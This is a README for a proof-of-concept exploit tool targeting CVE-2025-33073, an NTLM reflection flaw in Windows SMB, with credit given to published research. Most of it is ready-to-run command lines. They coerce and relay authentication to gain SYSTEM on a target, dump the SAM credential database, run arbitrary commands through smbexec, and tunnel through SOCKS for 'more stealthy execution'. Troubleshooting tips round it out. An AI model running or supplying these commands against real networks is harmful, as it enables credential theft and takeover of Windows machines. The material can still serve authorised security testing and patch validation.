PoC Exploit for the NTLM reflection SMB flaw.
All credits go to the offical research:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
OS: Kali Linux (has most packages pre-installed).
- NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
- impacket-ntlmrelayx
- dnstool.py (included in repo)
- xterm (only for GUI)
GUI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
CLI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
Custom command
Instead of running secretsdump a custom command can be executed.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
SOCKS
For more stealthy execution of commands after valid connection as SYSTEM has been made. --target and --target-ip should be equal here.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
Also a custom command can be ran through proxychains instead of dumping SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
If you're in the same broadcast domain as the device and it's vulnerable for LLMNR poisioning it's possible to exploit a device without having to register a DNS record.
- I've seen the attack not work sometimes because the hostname is used for the attack which results in a DNS lookup from Kali. If Kali is not using the DNS server or you get a '/ FAILED' message from impacket-ntlmrelayx try adding the host to your /etc/hosts file. This should result in the attack working.
- If using IP the attack should work. Sometimes running it multiple times will result in a SUCCESS instead of failure. It's until now not perfectly clear why this happens. I think it has something to do with networking.
- Try another coerce method using -M or --method.
Local NTLM authentication takes place
Local NTLM authentication does not take place resulting in a FAILED attempt
- xterm allows copying and pasting with the middle mouse button.
- DNS-record should also be known to the client, this can take more time in some occasions. With more time I mean give it a couple of minutes.
- This is just a PoC which means AV/EDR bypasses have not been tried to bypass. Use at own risk.
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073